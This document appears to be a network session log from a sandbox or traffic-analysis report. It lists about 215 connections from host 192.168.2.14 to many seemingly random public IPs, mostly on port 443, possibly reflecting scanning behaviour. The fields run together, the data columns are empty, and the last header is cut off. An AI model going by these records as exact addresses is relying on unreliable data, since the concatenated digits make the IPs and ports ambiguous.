                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21092192.168.2.1439130204.201.85.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21093192.168.2.144431047.205.132.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21094192.168.2.143883247.45.135.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21095192.168.2.1434100110.45.206.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21096192.168.2.1440852172.2.49.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21097192.168.2.145442077.181.99.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21098192.168.2.1433196161.60.55.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21099192.168.2.1437340132.194.53.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21100192.168.2.1455734114.199.202.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21101192.168.2.1452932211.207.46.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21102192.168.2.144553277.75.232.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21103192.168.2.1459014160.1.192.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21104192.168.2.1449682142.124.102.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21105192.168.2.143794254.80.229.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21106192.168.2.14411981.164.27.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21107192.168.2.143986293.58.166.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21108192.168.2.1438144139.0.63.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21109192.168.2.143988669.82.249.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21110192.168.2.143781659.223.193.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21111192.168.2.1447332165.66.60.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21112192.168.2.1453170138.207.88.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21113192.168.2.145210674.154.169.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21114192.168.2.1437110207.27.241.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21115192.168.2.143523476.92.28.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21116192.168.2.144905495.71.160.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21117192.168.2.1456490208.253.169.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21118192.168.2.143922441.176.71.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21119192.168.2.1436206157.138.28.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21120192.168.2.1445920172.90.229.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21121192.168.2.144469079.160.111.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21122192.168.2.144658643.190.12.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21123192.168.2.1433848181.212.96.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21124192.168.2.1433778195.199.204.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21125192.168.2.1450892117.143.14.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21126192.168.2.1449596223.57.176.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21127192.168.2.1442256149.184.59.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21128192.168.2.1439624109.197.174.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21129192.168.2.144153437.171.80.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21130192.168.2.145200893.129.118.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21131192.168.2.144845048.76.59.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21132192.168.2.1446050176.71.65.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21133192.168.2.1436734176.93.214.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21134192.168.2.1449144184.41.167.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21135192.168.2.14377889.7.156.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21136192.168.2.1455766185.184.122.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21137192.168.2.1438494204.97.200.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21138192.168.2.1440672168.198.212.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21139192.168.2.144802478.111.3.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21140192.168.2.1458926152.99.240.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21141192.168.2.1432816120.57.90.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21142192.168.2.1447616216.180.14.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21143192.168.2.1447758154.69.188.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21144192.168.2.144507284.18.253.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21145192.168.2.145424481.32.129.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21146192.168.2.143578834.219.132.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21147192.168.2.1445308136.197.173.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21148192.168.2.1452350178.11.9.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21149192.168.2.1451582199.159.154.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21150192.168.2.1450664121.105.176.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21151192.168.2.1439554208.46.178.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21152192.168.2.1438164158.67.170.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21153192.168.2.145457837.130.104.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21154192.168.2.1455558222.185.10.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21155192.168.2.146027862.93.150.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21156192.168.2.1451478144.253.83.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21157192.168.2.1456764169.58.158.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21158192.168.2.144133238.38.75.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21159192.168.2.1446658149.96.240.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21160192.168.2.1452210216.95.33.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21161192.168.2.143404668.116.226.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21162192.168.2.1434432171.209.124.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21163192.168.2.1449796191.137.68.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21164192.168.2.143283087.195.88.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21165192.168.2.144205023.4.143.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21166192.168.2.1439028163.179.202.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21167192.168.2.14375482.106.242.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21168192.168.2.1442964200.253.189.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21169192.168.2.1455328126.72.98.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21170192.168.2.1458994160.53.171.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21171192.168.2.1434632197.78.40.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21172192.168.2.1458756202.157.160.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21173192.168.2.1436842159.68.155.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21174192.168.2.1447928104.18.4.1458080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21175192.168.2.1451900160.142.70.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21176192.168.2.144519046.186.186.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21177192.168.2.1450490172.169.94.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21178192.168.2.1455838135.167.90.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21179192.168.2.143384413.115.234.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21180192.168.2.1445374202.45.22.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21181192.168.2.1437890142.17.208.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21182192.168.2.1451082163.68.117.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21183192.168.2.1446810176.160.201.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21184192.168.2.145706080.154.93.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21185192.168.2.1435102110.116.198.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21186192.168.2.1434976171.129.8.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21187192.168.2.1458820205.193.118.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21188192.168.2.143747858.131.220.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21189192.168.2.144642851.151.149.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21190192.168.2.1453026181.134.120.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21191192.168.2.144029446.248.103.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21192192.168.2.143352043.180.131.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21193192.168.2.1443760208.28.114.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21194192.168.2.1452510150.185.116.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21195192.168.2.143604654.45.72.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21196192.168.2.1433752155.118.204.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21197192.168.2.1444076100.166.177.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21198192.168.2.145027089.75.213.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21199192.168.2.144194431.133.172.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21200192.168.2.1436512190.157.73.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21201192.168.2.1447724138.33.86.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21202192.168.2.145934081.112.216.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21203192.168.2.1437140111.253.90.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21204192.168.2.1447356105.195.31.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21205192.168.2.143513881.17.61.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21206192.168.2.1435808101.219.220.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21207192.168.2.145868071.75.45.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21208192.168.2.1443654199.216.85.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21209192.168.2.1460698109.247.190.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21210192.168.2.145571036.147.57.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21211192.168.2.1445914154.211.220.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21212192.168.2.1459838156.212.114.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21213192.168.2.144916278.188.131.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21214192.168.2.1436814178.90.182.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21215192.168.2.1439442137.55.163.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21216192.168.2.145286050.232.188.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21217192.168.2.1448476178.110.130.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21218192.168.2.1458332213.1.115.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21219192.168.2.143560827.82.18.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21220192.168.2.1433770116.254.209.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21221192.168.2.1436634182.33.116.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21222192.168.2.145029036.34.14.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21223192.168.2.1442636123.53.169.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21224192.168.2.145199482.63.219.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21225192.168.2.144456058.161.112.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21226192.168.2.145161067.8.244.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21227192.168.2.1440152172.66.203.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21228192.168.2.1452998144.84.153.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21229192.168.2.1440900152.123.189.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21230192.168.2.1443830144.128.141.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21231192.168.2.1459274156.169.197.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21232192.168.2.145953037.254.11.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21233192.168.2.1434024182.1.201.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21234192.168.2.14378064.194.115.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21235192.168.2.1454010111.63.84.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21236192.168.2.146005076.15.214.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21237192.168.2.1448086172.214.159.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21238192.168.2.1446630186.193.20.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21239192.168.2.144668458.67.156.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21240192.168.2.144282227.8.71.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21241192.168.2.1434448181.199.141.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21242192.168.2.146070442.249.21.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21243192.168.2.143593847.130.158.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21244192.168.2.1446072177.171.246.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21245192.168.2.1451188130.37.202.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21246192.168.2.1453424181.16.67.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21247192.168.2.1446594190.179.72.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21248192.168.2.143964290.189.206.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21249192.168.2.145351680.58.135.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21250192.168.2.1442556108.214.141.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21251192.168.2.144021683.30.60.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21252192.168.2.1436360148.176.106.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21253192.168.2.1441224221.233.112.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21254192.168.2.1443274154.0.96.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21255192.168.2.1445330122.59.161.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21256192.168.2.144870034.172.147.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21257192.168.2.1432834101.61.65.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21258192.168.2.144418825.182.213.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21259192.168.2.143863073.10.145.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21260192.168.2.143798896.15.55.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21261192.168.2.144846823.229.197.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21262192.168.2.1457838132.231.134.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21263192.168.2.143470295.147.154.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21264192.168.2.1455206181.25.207.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21265192.168.2.1453416195.46.237.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21266192.168.2.145612034.103.224.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21267192.168.2.144854258.11.207.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21268192.168.2.1445274102.238.153.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21269192.168.2.1449640193.128.180.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21270192.168.2.14538704.18.245.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21271192.168.2.145721844.245.233.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21272192.168.2.1455410172.182.89.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21273192.168.2.1432834128.5.122.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21274192.168.2.1439710101.9.121.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21275192.168.2.144362467.140.182.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21276192.168.2.144129213.78.124.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21277192.168.2.1433348132.18.40.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21278192.168.2.145072847.209.247.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21279192.168.2.1458964161.60.64.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21280192.168.2.145989895.247.203.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21281192.168.2.144682691.0.176.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21282192.168.2.1437194177.76.184.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21283192.168.2.1451604175.34.149.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21284192.168.2.145754852.120.30.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21285192.168.2.144526287.120.224.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21286192.168.2.1448058169.73.252.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21287192.168.2.1445052213.194.200.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21288192.168.2.1459702185.35.69.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21289192.168.2.145168854.41.62.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21290192.168.2.1460882138.17.8.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21291192.168.2.1453498112.18.182.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21292192.168.2.144514283.114.161.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21293192.168.2.1457082175.175.229.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21294192.168.2.143572024.50.7.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21295192.168.2.144525820.180.152.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21296192.168.2.143683671.232.56.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21297192.168.2.145296091.219.0.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21298192.168.2.1443656135.56.190.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21299192.168.2.143450097.92.88.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21300192.168.2.1445160207.126.201.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21301192.168.2.1447290111.41.129.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21302192.168.2.1455098185.134.194.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21303192.168.2.1441280140.62.75.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
